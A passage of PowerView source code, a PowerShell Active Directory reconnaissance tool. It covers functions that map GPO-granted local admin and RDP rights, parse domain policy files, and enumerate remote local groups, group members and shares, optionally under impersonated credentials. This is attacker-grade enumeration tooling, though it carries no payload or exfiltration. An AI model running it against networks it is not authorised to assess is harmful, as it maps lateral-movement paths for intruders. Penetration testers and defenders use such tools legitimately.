Otherwise, if -OUIdentity is supplied, the same process is executed to find linked GPOs and
localgroup specifications.
.PARAMETER ComputerIdentity
A SamAccountName (e.g. WINDOWS10$), DistinguishedName (e.g. CN=WINDOWS10,CN=Computers,DC=testlab,DC=local),
SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1124), GUID (e.g. 4f16b6bc-7010-4cbf-b628-f3cfe20f6994),
or a dns host name (e.g. windows10.testlab.local) for the computer to identity GPO local group mappings for.
.PARAMETER OUIdentity
An OU name (e.g. TestOU), DistinguishedName (e.g. OU=TestOU,DC=testlab,DC=local), or
GUID (e.g. 8a9ba22a-8977-47e6-84ce-8c26af4e1e6a) for the OU to identity GPO local group mappings for.
.PARAMETER LocalGroup
The local group to check access against.
Can be "Administrators" (S-1-5-32-544), "RDP/Remote Desktop Users" (S-1-5-32-555),
or a custom local SID. Defaults to local 'Administrators'.
.PARAMETER Domain
Specifies the domain to enumerate GPOs for, defaults to the current domain.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to.
.PARAMETER SearchScope
Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
.PARAMETER ResultPageSize
Specifies the PageSize to set for the LDAP searcher object.
.PARAMETER ServerTimeLimit
Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
.PARAMETER Tombstone
Switch. Specifies that the searcher should also return deleted/tombstoned objects.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.EXAMPLE
Get-DomainGPOComputerLocalGroupMapping -ComputerName WINDOWS3.testlab.local
Finds users who have local admin rights over WINDOWS3 through GPO correlation.
.EXAMPLE
Get-DomainGPOComputerLocalGroupMapping -Domain dev.testlab.local -ComputerName WINDOWS4.dev.testlab.local -LocalGroup RDP
Finds users who have RDP rights over WINDOWS4 through GPO correlation.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainGPOComputerLocalGroupMapping -Credential $Cred -ComputerIdentity SQL.testlab.local
.OUTPUTS
PowerView.GGPOComputerLocalGroupMember
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType('PowerView.GGPOComputerLocalGroupMember')]
[CmdletBinding(DefaultParameterSetName = 'ComputerIdentity')]
Param(
[Parameter(Position = 0, ParameterSetName = 'ComputerIdentity', Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('ComputerName', 'Computer', 'DistinguishedName', 'SamAccountName', 'Name')]
[String]
$ComputerIdentity,
[Parameter(Mandatory = $True, ParameterSetName = 'OUIdentity')]
[Alias('OU')]
[String]
$OUIdentity,
[String]
[ValidateSet('Administrators', 'S-1-5-32-544', 'RDP', 'Remote Desktop Users', 'S-1-5-32-555')]
$LocalGroup = 'Administrators',
[ValidateNotNullOrEmpty()]
[String]
$Domain,
[ValidateNotNullOrEmpty()]
[Alias('ADSPath')]
[String]
$SearchBase,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
$SearchScope = 'Subtree',
[ValidateRange(1, 10000)]
[Int]
$ResultPageSize = 200,
[ValidateRange(1, 10000)]
[Int]
$ServerTimeLimit,
[Switch]
$Tombstone,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
BEGIN {
$CommonArguments = @{}
if ($PSBoundParameters['Domain']) { $CommonArguments['Domain'] = $Domain }
if ($PSBoundParameters['Server']) { $CommonArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $CommonArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $CommonArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $CommonArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['Tombstone']) { $CommonArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $CommonArguments['Credential'] = $Credential }
}
PROCESS {
if ($PSBoundParameters['ComputerIdentity']) {
$Computers = Get-DomainComputer @CommonArguments -Identity $ComputerIdentity -Properties 'distinguishedname,dnshostname'
if (-not $Computers) {
throw "[Get-DomainGPOComputerLocalGroupMapping] Computer $ComputerIdentity not found. Try a fully qualified host name."
}
ForEach ($Computer in $Computers) {
$GPOGuids = @()
# extract any GPOs linked to this computer's OU through gpLink
$DN = $Computer.distinguishedname
$OUIndex = $DN.IndexOf('OU=')
if ($OUIndex -gt 0) {
$OUName = $DN.SubString($OUIndex)
}
if ($OUName) {
$GPOGuids += Get-DomainOU @CommonArguments -SearchBase $OUName -LDAPFilter '(gplink=*)' | ForEach-Object {
Select-String -InputObject $_.gplink -Pattern '(\{){0,1}[0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}(\}){0,1}' -AllMatches | ForEach-Object {$_.Matches | Select-Object -ExpandProperty Value }
}
}
# extract any GPOs linked to this computer's site through gpLink
Write-Verbose "Enumerating the sitename for: $($Computer.dnshostname)"
$ComputerSite = (Get-NetComputerSiteName -ComputerName $Computer.dnshostname).SiteName
if ($ComputerSite -and ($ComputerSite -notmatch 'Error')) {
$GPOGuids += Get-DomainSite @CommonArguments -Identity $ComputerSite -LDAPFilter '(gplink=*)' | ForEach-Object {
Select-String -InputObject $_.gplink -Pattern '(\{){0,1}[0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}(\}){0,1}' -AllMatches | ForEach-Object {$_.Matches | Select-Object -ExpandProperty Value }
}
}
# process any GPO local group settings from the GPO GUID set
$GPOGuids | Get-DomainGPOLocalGroup @CommonArguments | Sort-Object -Property GPOName -Unique | ForEach-Object {
$GPOGroup = $_
if($GPOGroup.GroupMembers) {
$GPOMembers = $GPOGroup.GroupMembers
}
else {
$GPOMembers = $GPOGroup.GroupSID
}
$GPOMembers | ForEach-Object {
$Object = Get-DomainObject @CommonArguments -Identity $_
$IsGroup = @('268435456','268435457','536870912','536870913') -contains $Object.samaccounttype
$GPOComputerLocalGroupMember = New-Object PSObject
$GPOComputerLocalGroupMember | Add-Member Noteproperty 'ComputerName' $Computer.dnshostname
$GPOComputerLocalGroupMember | Add-Member Noteproperty 'ObjectName' $Object.samaccountname
$GPOComputerLocalGroupMember | Add-Member Noteproperty 'ObjectDN' $Object.distinguishedname
$GPOComputerLocalGroupMember | Add-Member Noteproperty 'ObjectSID' $_
$GPOComputerLocalGroupMember | Add-Member Noteproperty 'IsGroup' $IsGroup
$GPOComputerLocalGroupMember | Add-Member Noteproperty 'GPODisplayName' $GPOGroup.GPODisplayName
$GPOComputerLocalGroupMember | Add-Member Noteproperty 'GPOGuid' $GPOGroup.GPOName
$GPOComputerLocalGroupMember | Add-Member Noteproperty 'GPOPath' $GPOGroup.GPOPath
$GPOComputerLocalGroupMember | Add-Member Noteproperty 'GPOType' $GPOGroup.GPOType
$GPOComputerLocalGroupMember.PSObject.TypeNames.Add('PowerView.GPOComputerLocalGroupMember')
$GPOComputerLocalGroupMember
}
}
}
}
}
}
function Get-DomainPolicyData {
<#
.SYNOPSIS
Returns the default domain policy or the domain controller policy for the current
domain or a specified domain/domain controller.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-DomainGPO, Get-GptTmpl, ConvertFrom-SID
.DESCRIPTION
Returns the default domain policy or the domain controller policy for the current
domain or a specified domain/domain controller using Get-DomainGPO.
.PARAMETER Domain
The domain to query for default policies, defaults to the current domain.
.PARAMETER Policy
Extract 'Domain', 'DC' (domain controller) policies, or 'All' for all policies.
Otherwise queries for the particular GPO name or GUID.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to.
.PARAMETER ServerTimeLimit
Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.EXAMPLE
Get-DomainPolicyData
Returns the default domain policy for the current domain.
.EXAMPLE
Get-DomainPolicyData -Domain dev.testlab.local
Returns the default domain policy for the dev.testlab.local domain.
.EXAMPLE
Get-DomainGPO | Get-DomainPolicy
Parses any GptTmpl.infs found for any policies in the current domain.
.EXAMPLE
Get-DomainPolicyData -Policy DC -Domain dev.testlab.local
Returns the policy for the dev.testlab.local domain controller.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainPolicyData -Credential $Cred
.OUTPUTS
Hashtable
Ouputs a hashtable representing the parsed GptTmpl.inf file.
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType([Hashtable])]
[CmdletBinding()]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('Source', 'Name')]
[String]
$Policy = 'Domain',
[ValidateNotNullOrEmpty()]
[String]
$Domain,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[ValidateRange(1, 10000)]
[Int]
$ServerTimeLimit,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
BEGIN {
$SearcherArguments = @{}
if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
$ConvertArguments = @{}
if ($PSBoundParameters['Server']) { $ConvertArguments['Server'] = $Server }
if ($PSBoundParameters['Credential']) { $ConvertArguments['Credential'] = $Credential }
}
PROCESS {
if ($PSBoundParameters['Domain']) {
$SearcherArguments['Domain'] = $Domain
$ConvertArguments['Domain'] = $Domain
}
if ($Policy -eq 'All') {
$SearcherArguments['Identity'] = '*'
}
elseif ($Policy -eq 'Domain') {
$SearcherArguments['Identity'] = '{31B2F340-016D-11D2-945F-00C04FB984F9}'
}
elseif (($Policy -eq 'DomainController') -or ($Policy -eq 'DC')) {
$SearcherArguments['Identity'] = '{6AC1786C-016F-11D2-945F-00C04FB984F9}'
}
else {
$SearcherArguments['Identity'] = $Policy
}
$GPOResults = Get-DomainGPO @SearcherArguments
ForEach ($GPO in $GPOResults) {
# grab the GptTmpl.inf file and parse it
$GptTmplPath = $GPO.gpcfilesyspath + "\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf"
$ParseArgs = @{
'GptTmplPath' = $GptTmplPath
'OutputObject' = $True
}
if ($PSBoundParameters['Credential']) { $ParseArgs['Credential'] = $Credential }
# parse the GptTmpl.inf
Get-GptTmpl @ParseArgs | ForEach-Object {
$_ | Add-Member Noteproperty 'GPOName' $GPO.name
$_ | Add-Member Noteproperty 'GPODisplayName' $GPO.displayname
$_
}
}
}
}
########################################################
#
# Functions that enumerate a single host, either through
# WinNT, WMI, remote registry, or API calls
# (with PSReflect).
#
########################################################
function Get-NetLocalGroup {
<#
.SYNOPSIS
Enumerates the local groups on the local (or remote) machine.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: PSReflect
.DESCRIPTION
This function will enumerate the names and descriptions for the
local groups on the current, or remote, machine. By default, the Win32 API
call NetLocalGroupEnum will be used (for speed). Specifying "-Method WinNT"
causes the WinNT service provider to be used instead, which returns group
SIDs along with the group names and descriptions/comments.
.PARAMETER ComputerName
Specifies the hostname to query for sessions (also accepts IP addresses).
Defaults to the localhost.
.PARAMETER Method
The collection method to use, defaults to 'API', also accepts 'WinNT'.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to a remote machine. Only applicable with "-Method WinNT".
.EXAMPLE
Get-NetLocalGroup
ComputerName GroupName Comment
------------ --------- -------
WINDOWS1 Administrators Administrators have comple...
WINDOWS1 Backup Operators Backup Operators can overr...
WINDOWS1 Cryptographic Operators Members are authorized to ...
...
.EXAMPLE
Get-NetLocalGroup -Method Winnt
ComputerName GroupName GroupSID Comment
------------ --------- -------- -------
WINDOWS1 Administrators S-1-5-32-544 Administrators hav...
WINDOWS1 Backup Operators S-1-5-32-551 Backup Operators c...
WINDOWS1 Cryptographic Opera... S-1-5-32-569 Members are author...
...
.EXAMPLE
Get-NetLocalGroup -ComputerName primary.testlab.local
ComputerName GroupName Comment
------------ --------- -------
primary.testlab.local Administrators Administrators have comple...
primary.testlab.local Users Users are prevented from m...
primary.testlab.local Guests Guests have the same acces...
primary.testlab.local Print Operators Members can administer dom...
primary.testlab.local Backup Operators Backup Operators can overr...
.OUTPUTS
PowerView.LocalGroup.API
Custom PSObject with translated group property fields from API results.
PowerView.LocalGroup.WinNT
Custom PSObject with translated group property fields from WinNT results.
.LINK
https://msdn.microsoft.com/en-us/library/windows/desktop/aa370440(v=vs.85).aspx
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType('PowerView.LocalGroup.API')]
[OutputType('PowerView.LocalGroup.WinNT')]
[CmdletBinding()]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('HostName', 'dnshostname', 'name')]
[ValidateNotNullOrEmpty()]
[String[]]
$ComputerName = $Env:COMPUTERNAME,
[ValidateSet('API', 'WinNT')]
[Alias('CollectionMethod')]
[String]
$Method = 'API',
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
BEGIN {
if ($PSBoundParameters['Credential']) {
$LogonToken = Invoke-UserImpersonation -Credential $Credential
}
}
PROCESS {
ForEach ($Computer in $ComputerName) {
if ($Method -eq 'API') {
# if we're using the Netapi32 NetLocalGroupEnum API call to get the local group information
# arguments for NetLocalGroupEnum
$QueryLevel = 1
$PtrInfo = [IntPtr]::Zero
$EntriesRead = 0
$TotalRead = 0
$ResumeHandle = 0
# get the local user information
$Result = $Netapi32::NetLocalGroupEnum($Computer, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle)
# locate the offset of the initial intPtr
$Offset = $PtrInfo.ToInt64()
# 0 = success
if (($Result -eq 0) -and ($Offset -gt 0)) {
# Work out how much to increment the pointer by finding out the size of the structure
$Increment = $LOCALGROUP_INFO_1::GetSize()
# parse all the result structures
for ($i = 0; ($i -lt $EntriesRead); $i++) {
# create a new int ptr at the given offset and cast the pointer as our result structure
$NewIntPtr = New-Object System.Intptr -ArgumentList $Offset
$Info = $NewIntPtr -as $LOCALGROUP_INFO_1
$Offset = $NewIntPtr.ToInt64()
$Offset += $Increment
$LocalGroup = New-Object PSObject
$LocalGroup | Add-Member Noteproperty 'ComputerName' $Computer
$LocalGroup | Add-Member Noteproperty 'GroupName' $Info.lgrpi1_name
$LocalGroup | Add-Member Noteproperty 'Comment' $Info.lgrpi1_comment
$LocalGroup.PSObject.TypeNames.Insert(0, 'PowerView.LocalGroup.API')
$LocalGroup
}
# free up the result buffer
$Null = $Netapi32::NetApiBufferFree($PtrInfo)
}
else {
Write-Verbose "[Get-NetLocalGroup] Error: $(([ComponentModel.Win32Exception] $Result).Message)"
}
}
else {
# otherwise we're using the WinNT service provider
$ComputerProvider = [ADSI]"WinNT://$Computer,computer"
$ComputerProvider.psbase.children | Where-Object { $_.psbase.schemaClassName -eq 'group' } | ForEach-Object {
$LocalGroup = ([ADSI]$_)
$Group = New-Object PSObject
$Group | Add-Member Noteproperty 'ComputerName' $Computer
$Group | Add-Member Noteproperty 'GroupName' ($LocalGroup.InvokeGet('Name'))
$Group | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier($LocalGroup.InvokeGet('objectsid'),0)).Value)
$Group | Add-Member Noteproperty 'Comment' ($LocalGroup.InvokeGet('Description'))
$Group.PSObject.TypeNames.Insert(0, 'PowerView.LocalGroup.WinNT')
$Group
}
}
}
}
END {
if ($LogonToken) {
Invoke-RevertToSelf -TokenHandle $LogonToken
}
}
}
function Get-NetLocalGroupMember {
<#
.SYNOPSIS
Enumerates members of a specific local group on the local (or remote) machine.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: PSReflect, Convert-ADName
.DESCRIPTION
This function will enumerate the members of a specified local group on the
current, or remote, machine. By default, the Win32 API call NetLocalGroupGetMembers
will be used (for speed). Specifying "-Method WinNT" causes the WinNT service provider
to be used instead, which returns a larger amount of information.
.PARAMETER ComputerName
Specifies the hostname to query for sessions (also accepts IP addresses).
Defaults to the localhost.
.PARAMETER GroupName
The local group name to query for users. If not given, it defaults to "Administrators".
.PARAMETER Method
The collection method to use, defaults to 'API', also accepts 'WinNT'.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to a remote machine. Only applicable with "-Method WinNT".
.EXAMPLE
Get-NetLocalGroupMember | ft
ComputerName GroupName MemberName SID IsGroup IsDomain
------------ --------- ---------- --- ------- --------
WINDOWS1 Administrators WINDOWS1\Ad... S-1-5-21-25... False False
WINDOWS1 Administrators WINDOWS1\lo... S-1-5-21-25... False False
WINDOWS1 Administrators TESTLAB\Dom... S-1-5-21-89... True True
WINDOWS1 Administrators TESTLAB\har... S-1-5-21-89... False True
.EXAMPLE
Get-NetLocalGroupMember -Method winnt | ft
ComputerName GroupName MemberName SID IsGroup IsDomain
------------ --------- ---------- --- ------- --------
WINDOWS1 Administrators WINDOWS1\Ad... S-1-5-21-25... False False
WINDOWS1 Administrators WINDOWS1\lo... S-1-5-21-25... False False
WINDOWS1 Administrators TESTLAB\Dom... S-1-5-21-89... True True
WINDOWS1 Administrators TESTLAB\har... S-1-5-21-89... False True
.EXAMPLE
Get-NetLocalGroup | Get-NetLocalGroupMember | ft
ComputerName GroupName MemberName SID IsGroup IsDomain
------------ --------- ---------- --- ------- --------
WINDOWS1 Administrators WINDOWS1\Ad... S-1-5-21-25... False False
WINDOWS1 Administrators WINDOWS1\lo... S-1-5-21-25... False False
WINDOWS1 Administrators TESTLAB\Dom... S-1-5-21-89... True True
WINDOWS1 Administrators TESTLAB\har... S-1-5-21-89... False True
WINDOWS1 Guests WINDOWS1\Guest S-1-5-21-25... False False
WINDOWS1 IIS_IUSRS NT AUTHORIT... S-1-5-17 False False
WINDOWS1 Users NT AUTHORIT... S-1-5-4 False False
WINDOWS1 Users NT AUTHORIT... S-1-5-11 False False
WINDOWS1 Users WINDOWS1\lo... S-1-5-21-25... False UNKNOWN
WINDOWS1 Users TESTLAB\Dom... S-1-5-21-89... True UNKNOWN
.EXAMPLE
Get-NetLocalGroupMember -ComputerName primary.testlab.local | ft
ComputerName GroupName MemberName SID IsGroup IsDomain
------------ --------- ---------- --- ------- --------
primary.tes... Administrators TESTLAB\Adm... S-1-5-21-89... False False
primary.tes... Administrators TESTLAB\loc... S-1-5-21-89... False False
primary.tes... Administrators TESTLAB\Ent... S-1-5-21-89... True False
primary.tes... Administrators TESTLAB\Dom... S-1-5-21-89... True False
.OUTPUTS
PowerView.LocalGroupMember.API
Custom PSObject with translated group property fields from API results.
PowerView.LocalGroupMember.WinNT
Custom PSObject with translated group property fields from WinNT results.
.LINK
http://stackoverflow.com/questions/21288220/get-all-local-members-and-groups-displayed-together
http://msdn.microsoft.com/en-us/library/aa772211(VS.85).aspx
https://msdn.microsoft.com/en-us/library/windows/desktop/aa370601(v=vs.85).aspx
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType('PowerView.LocalGroupMember.API')]
[OutputType('PowerView.LocalGroupMember.WinNT')]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('HostName', 'dnshostname', 'name')]
[ValidateNotNullOrEmpty()]
[String[]]
$ComputerName = $Env:COMPUTERNAME,
[Parameter(ValueFromPipelineByPropertyName = $True)]
[ValidateNotNullOrEmpty()]
[String]
$GroupName = 'Administrators',
[ValidateSet('API', 'WinNT')]
[Alias('CollectionMethod')]
[String]
$Method = 'API',
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
BEGIN {
if ($PSBoundParameters['Credential']) {
$LogonToken = Invoke-UserImpersonation -Credential $Credential
}
}
PROCESS {
ForEach ($Computer in $ComputerName) {
if ($Method -eq 'API') {
# if we're using the Netapi32 NetLocalGroupGetMembers API call to get the local group information
# arguments for NetLocalGroupGetMembers
$QueryLevel = 2
$PtrInfo = [IntPtr]::Zero
$EntriesRead = 0
$TotalRead = 0
$ResumeHandle = 0
# get the local user information
$Result = $Netapi32::NetLocalGroupGetMembers($Computer, $GroupName, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle)
# locate the offset of the initial intPtr
$Offset = $PtrInfo.ToInt64()
$Members = @()
# 0 = success
if (($Result -eq 0) -and ($Offset -gt 0)) {
# Work out how much to increment the pointer by finding out the size of the structure
$Increment = $LOCALGROUP_MEMBERS_INFO_2::GetSize()
# parse all the result structures
for ($i = 0; ($i -lt $EntriesRead); $i++) {
# create a new int ptr at the given offset and cast the pointer as our result structure
$NewIntPtr = New-Object System.Intptr -ArgumentList $Offset
$Info = $NewIntPtr -as $LOCALGROUP_MEMBERS_INFO_2
$Offset = $NewIntPtr.ToInt64()
$Offset += $Increment
$SidString = ''
$Result2 = $Advapi32::ConvertSidToStringSid($Info.lgrmi2_sid, [ref]$SidString);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
if ($Result2 -eq 0) {
Write-Verbose "[Get-NetLocalGroupMember] Error: $(([ComponentModel.Win32Exception] $LastError).Message)"
}
else {
$Member = New-Object PSObject
$Member | Add-Member Noteproperty 'ComputerName' $Computer
$Member | Add-Member Noteproperty 'GroupName' $GroupName
$Member | Add-Member Noteproperty 'MemberName' $Info.lgrmi2_domainandname
$Member | Add-Member Noteproperty 'SID' $SidString
$IsGroup = $($Info.lgrmi2_sidusage -eq 'SidTypeGroup')
$Member | Add-Member Noteproperty 'IsGroup' $IsGroup
$Member.PSObject.TypeNames.Insert(0, 'PowerView.LocalGroupMember.API')
$Members += $Member
}
}
# free up the result buffer
$Null = $Netapi32::NetApiBufferFree($PtrInfo)
# try to extract out the machine SID by using the -500 account as a reference
$MachineSid = $Members | Where-Object {$_.SID -match '.*-500' -or ($_.SID -match '.*-501')} | Select-Object -Expand SID
if ($MachineSid) {
$MachineSid = $MachineSid.Substring(0, $MachineSid.LastIndexOf('-'))
$Members | ForEach-Object {
if ($_.SID -match $MachineSid) {
$_ | Add-Member Noteproperty 'IsDomain' $False
}
else {
$_ | Add-Member Noteproperty 'IsDomain' $True
}
}
}
else {
$Members | ForEach-Object {
if ($_.SID -notmatch 'S-1-5-21') {
$_ | Add-Member Noteproperty 'IsDomain' $False
}
else {
$_ | Add-Member Noteproperty 'IsDomain' 'UNKNOWN'
}
}
}
$Members
}
else {
Write-Verbose "[Get-NetLocalGroupMember] Error: $(([ComponentModel.Win32Exception] $Result).Message)"
}
}
else {
# otherwise we're using the WinNT service provider
try {
$GroupProvider = [ADSI]"WinNT://$Computer/$GroupName,group"
$GroupProvider.psbase.Invoke('Members') | ForEach-Object {
$Member = New-Object PSObject
$Member | Add-Member Noteproperty 'ComputerName' $Computer
$Member | Add-Member Noteproperty 'GroupName' $GroupName
$LocalUser = ([ADSI]$_)
$AdsPath = $LocalUser.InvokeGet('AdsPath').Replace('WinNT://', '')
$IsGroup = ($LocalUser.SchemaClassName -like 'group')
if(([regex]::Matches($AdsPath, '/')).count -eq 1) {
# DOMAIN\user
$MemberIsDomain = $True
$Name = $AdsPath.Replace('/', '\')
}
else {
# DOMAIN\machine\user
$MemberIsDomain = $False
$Name = $AdsPath.Substring($AdsPath.IndexOf('/')+1).Replace('/', '\')
}
$Member | Add-Member Noteproperty 'AccountName' $Name
$Member | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier($LocalUser.InvokeGet('ObjectSID'),0)).Value)
$Member | Add-Member Noteproperty 'IsGroup' $IsGroup
$Member | Add-Member Noteproperty 'IsDomain' $MemberIsDomain
# if ($MemberIsDomain) {
# # translate the binary sid to a string
# $Member | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier($LocalUser.InvokeGet('ObjectSID'),0)).Value)
# $Member | Add-Member Noteproperty 'Description' ''
# $Member | Add-Member Noteproperty 'Disabled' ''
# if ($IsGroup) {
# $Member | Add-Member Noteproperty 'LastLogin' ''
# }
# else {
# try {
# $Member | Add-Member Noteproperty 'LastLogin' $LocalUser.InvokeGet('LastLogin')
# }
# catch {
# $Member | Add-Member Noteproperty 'LastLogin' ''
# }
# }
# $Member | Add-Member Noteproperty 'PwdLastSet' ''
# $Member | Add-Member Noteproperty 'PwdExpired' ''
# $Member | Add-Member Noteproperty 'UserFlags' ''
# }
# else {
# # translate the binary sid to a string
# $Member | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier($LocalUser.InvokeGet('ObjectSID'),0)).Value)
# $Member | Add-Member Noteproperty 'Description' ($LocalUser.Description)
# if ($IsGroup) {
# $Member | Add-Member Noteproperty 'PwdLastSet' ''
# $Member | Add-Member Noteproperty 'PwdExpired' ''
# $Member | Add-Member Noteproperty 'UserFlags' ''
# $Member | Add-Member Noteproperty 'Disabled' ''
# $Member | Add-Member Noteproperty 'LastLogin' ''
# }
# else {
# $Member | Add-Member Noteproperty 'PwdLastSet' ( (Get-Date).AddSeconds(-$LocalUser.PasswordAge[0]))
# $Member | Add-Member Noteproperty 'PwdExpired' ( $LocalUser.PasswordExpired[0] -eq '1')
# $Member | Add-Member Noteproperty 'UserFlags' ( $LocalUser.UserFlags[0] )
# # UAC flags of 0x2 mean the account is disabled
# $Member | Add-Member Noteproperty 'Disabled' $(($LocalUser.UserFlags.value -band 2) -eq 2)
# try {
# $Member | Add-Member Noteproperty 'LastLogin' ( $LocalUser.LastLogin[0])
# }
# catch {
# $Member | Add-Member Noteproperty 'LastLogin' ''
# }
# }
# }
$Member
}
}
catch {
Write-Verbose "[Get-NetLocalGroupMember] Error for $Computer : $_"
}
}
}
}
END {
if ($LogonToken) {
Invoke-RevertToSelf -TokenHandle $LogonToken
}
}
}
function Get-NetShare {
<#
.SYNOPSIS
Returns open shares on the local (or a remote) machine.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf
.DESCRIPTION
This function will execute the NetShareEnum Win32API call to query
a given host for open shares. This is a replacement for "net share \\hostname".
.PARAMETER ComputerName
Specifies the hostname to query for shares (also accepts IP addresses).
Defaults to 'localhost'.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the remote system using Invoke-UserImpersonation.
.EXAMPLE
Get-NetShare
Returns active shares on the local host.
.EXAMPLE
Get-NetShare -ComputerName sqlserver
Returns active shares on the 'sqlserver' host
.EXAMPLE
Get-DomainComputer | Get-NetShare
Returns all shares for all computers in the domain.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-NetShare -ComputerName sqlserver -Credential $Cred
.OUTPUTS
PowerView.ShareInfo
A PSCustomObject representing a SHARE_INFO_1 structure, including
the name/type/remark for each share, with the ComputerName added.
.LINK
http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/
#>
[OutputType('PowerView.ShareInfo')]
[CmdletBinding()]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('HostName', 'dnshostname', 'name')]
[ValidateNotNullOrEmpty()]
[String[]]
$ComputerName = 'localhost',
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
BEGIN {
if ($PSBoundParameters['Credential']) {
$LogonToken = Invoke-UserImpersonation -Credential $Credential
}
}
PROCESS {
ForEach ($Computer in $ComputerName) {
# arguments for NetShareEnum
$QueryLevel = 1
$PtrInfo = [IntPtr]::Zero
$EntriesRead = 0
$TotalRead = 0
$ResumeHandle = 0
# get the raw share information
$Result = $Netapi32::NetShareEnum($Computer, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle)
# locate the offset of the initial intPtr
$Offset = $PtrInfo.ToInt64()
# 0 = success
if (($Result -eq 0) -and ($Offset -gt 0)) {
# work out how much to increment the pointer by finding out the size of the structure
$Increment = $SHARE_INFO_1::GetSize()
# parse all the result structures
for ($i = 0; ($i -lt $EntriesRead); $i++) {
# create a new int ptr at the given offset and cast the pointer as our result structure
$NewIntPtr = New-Object System.Intptr -ArgumentList $Offset
$Info = $NewIntPtr -as $SHARE_INFO_1
# return all the sections of the structure - have to do it this way for V2
$Share = $Info | Select-Object *
$Share | Add-Member Noteproperty 'ComputerName' $Computer
$Share.PSObject.TypeNames.Insert(0, 'PowerView.ShareInfo')
$Offset = $NewIntPtr.ToInt64()
$Offset += $Increment
$Share
}
# free up the result buffer
$Null = $Netapi32::NetApiBufferFree($PtrInfo)
}
else {
Write-Verbose "[Get-NetShare] Error: $(([ComponentModel.Win32Exception] $Result).Message)"
}
}
}
END {
if ($LogonToken) {
